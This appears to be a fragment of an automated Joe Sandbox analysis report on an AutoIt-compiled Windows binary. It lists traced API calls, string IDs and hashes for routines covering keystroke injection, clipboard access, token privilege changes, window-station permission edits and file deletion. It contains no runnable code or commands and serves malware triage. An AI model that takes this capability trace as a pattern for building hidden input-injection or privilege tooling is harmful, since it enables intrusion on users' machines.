                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0077F796
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D4388
                                                                                                                                        • IsIconic.USER32(000000FF), ref: 007D4391
                                                                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 007D439E
                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 007D43A8
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D43BE
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 007D43C5
                                                                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007D43D1
                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007D43E2
                                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007D43EA
                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 007D43F2
                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 007D43F5
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D440A
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 007D4415
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D441F
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 007D4424
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D442D
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 007D4432
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D443C
                                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 007D4441
                                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 007D4444
                                                                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 007D446B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,008222E8,?,00000000,?,00763E2E,?,00000000,?,007FDBF0,00000000,?), ref: 0076BE8B
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00763E2E,?,00000000,?,007FDBF0,00000000,?,00000002), ref: 0076BEA7
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0076BF19
                                                                                                                                          • Part of subcall function 0078297D: __wsplitpath_helper.LIBCMT ref: 007829BD
                                                                                                                                        • _wcscpy.LIBCMT ref: 0076BF31
                                                                                                                                        • _wcscat.LIBCMT ref: 0076BF46
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076BF56
                                                                                                                                        • _wcscpy.LIBCMT ref: 0076C03E
                                                                                                                                        • _wcscpy.LIBCMT ref: 0076C1ED
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32 ref: 0076C250
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                          • Part of subcall function 0076C320: _memmove.LIBCMT ref: 0076C419
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$G-v$Unterminated string$_
                                                                                                                                        • API String ID: 2542276039-2536452045
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007631DA
                                                                                                                                          • Part of subcall function 007A7B9F: __wsplitpath.LIBCMT ref: 007A7BBC
                                                                                                                                          • Part of subcall function 007A7B9F: __wsplitpath.LIBCMT ref: 007A7BCF
                                                                                                                                          • Part of subcall function 007A7C0C: GetFileAttributesW.KERNEL32(?,007A6A7B), ref: 007A7C0D
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6B9D
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6BBB
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007A6BE2
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007A6BF8
                                                                                                                                        • _wcscpy.LIBCMT ref: 007A6C57
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6C6A
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6C7D
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 007A6CAB
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007A6CBC
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 007A6CDB
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 007A6CEA
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 007A6CFF
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007A6D10
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007A6D37
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007A6D53
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007A6D61
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 1867810238-1173974218
                                                                                                                                        APIs
                                                                                                                                        • OpenClipboard.USER32(007FDBF0), ref: 007B70C3
                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 007B70D1
                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 007B70D9
                                                                                                                                        • CloseClipboard.USER32 ref: 007B70E5
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007B7101
                                                                                                                                        • CloseClipboard.USER32 ref: 007B710B
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007B7120
                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 007B712D
                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 007B7135
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007B7142
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007B7176
                                                                                                                                        • CloseClipboard.USER32 ref: 007B7283
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3222323430-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079BF0F
                                                                                                                                          • Part of subcall function 0079BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0079BF3C
                                                                                                                                          • Part of subcall function 0079BEC3: GetLastError.KERNEL32 ref: 0079BF49
                                                                                                                                        • _memset.LIBCMT ref: 0079BA34
                                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0079BA86
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0079BA97
                                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0079BAAE
                                                                                                                                        • GetProcessWindowStation.USER32 ref: 0079BAC7
                                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 0079BAD1
                                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0079BAEB
                                                                                                                                          • Part of subcall function 0079B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0079B8C5
                                                                                                                                          • Part of subcall function 0079B8B0: CloseHandle.KERNEL32(?), ref: 0079B8D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007B2065
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B207A
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2091
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 007B20A3
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 007B20BD
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007B20D5
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B20E0
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007B20FC
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2123
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B213A
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B214C
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00813A68), ref: 007B216A
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B2174
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B2181
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B2191
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 007CF14B
                                                                                                                                          • Part of subcall function 007CD5EE: ClientToScreen.USER32(?,?), ref: 007CD617
                                                                                                                                          • Part of subcall function 007CD5EE: GetWindowRect.USER32(?,?), ref: 007CD68D
                                                                                                                                          • Part of subcall function 007CD5EE: PtInRect.USER32(?,?,007CEB2C), ref: 007CD69D
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007CF1B4
                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007CF1BF
                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007CF1E2
                                                                                                                                        • _wcscat.LIBCMT ref: 007CF212
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007CF229
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 007CF242
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 007CF259
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 007CF27B
                                                                                                                                        • DragFinish.SHELL32(?), ref: 007CF282
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 007CF36D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                        • API String ID: 2166380349-3440237614
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007B21C0
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B21D5
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B21EC
                                                                                                                                          • Part of subcall function 007A7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007A7621
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007B221B
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B2226
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 007B2242
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2269
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2280
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B2292
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00813A68), ref: 007B22B0
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B22BA
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B22C7
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007B22D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove_memset
                                                                                                                                        • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                        • API String ID: 3555123492-286096704
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007CED0C
                                                                                                                                        • GetFocus.USER32 ref: 007CED1C
                                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 007CED27
                                                                                                                                        • _memset.LIBCMT ref: 007CEE52
                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 007CEE7D
                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 007CEE9D
                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 007CEEB0
                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 007CEEE4
                                                                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 007CEF2C
                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007CEF64
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 007CEF99
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 3616455698-4108050209
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079B903
                                                                                                                                          • Part of subcall function 0079B8E7: GetLastError.KERNEL32(?,0079B3CB,?,?,?), ref: 0079B90D
                                                                                                                                          • Part of subcall function 0079B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0079B3CB,?,?,?), ref: 0079B91C
                                                                                                                                          • Part of subcall function 0079B8E7: RtlAllocateHeap.NTDLL(00000000,?,0079B3CB), ref: 0079B923
                                                                                                                                          • Part of subcall function 0079B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079B93A
                                                                                                                                          • Part of subcall function 0079B982: GetProcessHeap.KERNEL32(00000008,0079B3E1,00000000,00000000,?,0079B3E1,?), ref: 0079B98E
                                                                                                                                          • Part of subcall function 0079B982: RtlAllocateHeap.NTDLL(00000000,?,0079B3E1), ref: 0079B995
                                                                                                                                          • Part of subcall function 0079B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0079B3E1,?), ref: 0079B9A6
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0079B3FC
                                                                                                                                        • _memset.LIBCMT ref: 0079B411
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079B430
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0079B441
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0079B47E
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0079B49A
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0079B4B7
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0079B4C6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0079B4CD
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079B4EE
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 0079B4F5
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0079B526
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0079B54C
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0079B560
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2347767575-0
                                                                                                                                        • Opcode ID: cd260d190e65472c7cf08c000b2fb7bba3146638d45b23c290c6b65cb0e8f67d
                                                                                                                                        • Instruction ID: 85c4ceeb4baf75f5258dc40824c90f03c04e2ff7aa8ca41b4a96f20d6e573052
                                                                                                                                        • Opcode Fuzzy Hash: cd260d190e65472c7cf08c000b2fb7bba3146638d45b23c290c6b65cb0e8f67d
                                                                                                                                        • Instruction Fuzzy Hash: F0515D71900249EFDF10DFA4ED85EEEBB79FF08310F048119E915AB2A1D7399A15CB64
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007631DA
                                                                                                                                          • Part of subcall function 007A7C0C: GetFileAttributesW.KERNEL32(?,007A6A7B), ref: 007A7C0D
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6E7E
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007A6E99
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007A6EAE
                                                                                                                                        • _wcscpy.LIBCMT ref: 007A6EDD
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6EEF
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6F01
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007A6F0E
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007A6F22
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007A6F3D
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2643075503-1173974218
                                                                                                                                        • Opcode ID: 3f98d7a0780ff2604c6d807de2e906c786b2cf54ff6eb81b9c827aff72887e0c
                                                                                                                                        • Instruction ID: b8d4b25295b27204e94eabeba52a60cfbc65f2d923b94480f907b762502f199e
                                                                                                                                        • Opcode Fuzzy Hash: 3f98d7a0780ff2604c6d807de2e906c786b2cf54ff6eb81b9c827aff72887e0c
                                                                                                                                        • Instruction Fuzzy Hash: 56219572409384AEC710EBA4D8899DB77DCAF99214F444E1AF5D4C3141EA38E64D87A2
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                        • API String ID: 0-2893523900
                                                                                                                                        • Opcode ID: 8b94ac654c273235a599568dc874f1f3a980d39c16f4c6d2bb1b270fbbff9abe
                                                                                                                                        • Instruction ID: 488ce68e76885a990940eb0c784b486ad11005f8023c24a6d1c954bd22882a65
                                                                                                                                        • Opcode Fuzzy Hash: 8b94ac654c273235a599568dc874f1f3a980d39c16f4c6d2bb1b270fbbff9abe
                                                                                                                                        • Instruction Fuzzy Hash: D362A4B1E00259DBDF24CF99C8947AEB7B5FF48310F54816AE846EB281D7789E41CB90
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                        • Opcode ID: a6a309d449c9109d39bc89c3193fbafc26fc476826b8a848228687f1c25f2ba7
                                                                                                                                        • Instruction ID: 90513ca17b6e38453eb2a6c89637af6d83a8c0e986f9711f36d19a7c4bd3eaa7
                                                                                                                                        • Opcode Fuzzy Hash: a6a309d449c9109d39bc89c3193fbafc26fc476826b8a848228687f1c25f2ba7
                                                                                                                                        • Instruction Fuzzy Hash: 98216D31205250EFDB24AF64DC99B6D7BA8FF88751F00C019F90A9F261DB79AD41CB98
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007B24F6
                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007B2526
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B253A
                                                                                                                                        • _wcscmp.LIBCMT ref: 007B2555
                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007B25F3
                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007B2609
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 713712311-438819550
                                                                                                                                        • Opcode ID: 9e7375626576ab1495576c2f93d96fab7054cbc4109eb5dd600b864d94da641a
                                                                                                                                        • Instruction ID: 20b0f82d8b6039c42e40636c8ed15d4006dc9ca3c0499c3605af6463c498c5f0
                                                                                                                                        • Opcode Fuzzy Hash: 9e7375626576ab1495576c2f93d96fab7054cbc4109eb5dd600b864d94da641a
                                                                                                                                        • Instruction Fuzzy Hash: B8417F7190521AAFCF24EFA4CC59BEE7BB4FF08304F104456E815A6192E7389E95CF90
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: e7079a791bc3170b9841297266614a75c491fbcdcbc31fdfe33c97e8c03e1858
                                                                                                                                        • Instruction ID: 368526743c11e547a65e0b8903f6e75363030d4e53d4625c5c1e38f2d32e5fa5
                                                                                                                                        • Opcode Fuzzy Hash: e7079a791bc3170b9841297266614a75c491fbcdcbc31fdfe33c97e8c03e1858
                                                                                                                                        • Instruction Fuzzy Hash: 9E128E70A00609DFDF14DFA5D985AAEB3F5FF48300F208569E846E7251EB39AD12CB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                          • Part of subcall function 0077B736: GetCursorPos.USER32(000000FF), ref: 0077B749
                                                                                                                                          • Part of subcall function 0077B736: ScreenToClient.USER32(00000000,000000FF), ref: 0077B766
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000001), ref: 0077B78B
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000002), ref: 0077B799
                                                                                                                                        • ReleaseCapture.USER32 ref: 007CEB1A
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 007CEBC2
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007CEBD5
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 007CECAE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
